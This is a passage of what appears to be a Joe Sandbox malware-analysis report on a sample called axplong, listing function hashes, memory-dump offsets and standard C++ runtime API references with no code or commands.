                        • Instruction ID: f42aeac261b2adb0f40b8b0fa4639b7fc160415c266e93a2006de4a387c1bbc5
                        • Opcode Fuzzy Hash: de205fa9be4a0f97bd6701cea94ba7e8dcc399755ff42df4851b49c240e67f39
                        • Instruction Fuzzy Hash: 92319E31E04204AFDB60ABB9D905B9A73EAAF10320F15452FE44BDB391DF32ED808B55
                        APIs
                        • __Mtx_init_in_situ.LIBCPMT ref: 006A3962
                        • __Mtx_init_in_situ.LIBCPMT ref: 006A39A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Mtx_init_in_situ
                        • String ID: pBj
                        • API String ID: 3366076730-3298301059
                        • Opcode ID: 08f140c99986e50706f2301f832714d55e0ffc8f0e92e22c14f230c76b95b8e4
                        • Instruction ID: 0c217d5614bfb7aa1c7fc9afd2be386fda774c512cdc36ac35fb1c35b4d99896
                        • Opcode Fuzzy Hash: 08f140c99986e50706f2301f832714d55e0ffc8f0e92e22c14f230c76b95b8e4
                        • Instruction Fuzzy Hash: 864124B0501B058FD720DF19C588B9ABBF2FF44315F10861DE9AA8B341EBB4AA15CF80
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A2552
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID: P#j$P#j
                        • API String ID: 2659868963-3156330307
                        • Opcode ID: e5eed19795a72e4bb8155792379a0df662cfe376ca83732e49e382773207bcf7
                        • Instruction ID: e17cb520a75467852008f29943b3fb8349ff4810e6d528f61d3543551a943860
                        • Opcode Fuzzy Hash: e5eed19795a72e4bb8155792379a0df662cfe376ca83732e49e382773207bcf7
                        • Instruction Fuzzy Hash: 1FF082B1E1020DDBC714DF68D84199EBBF9AF55300F1082AEE444A7301EA705A55CB99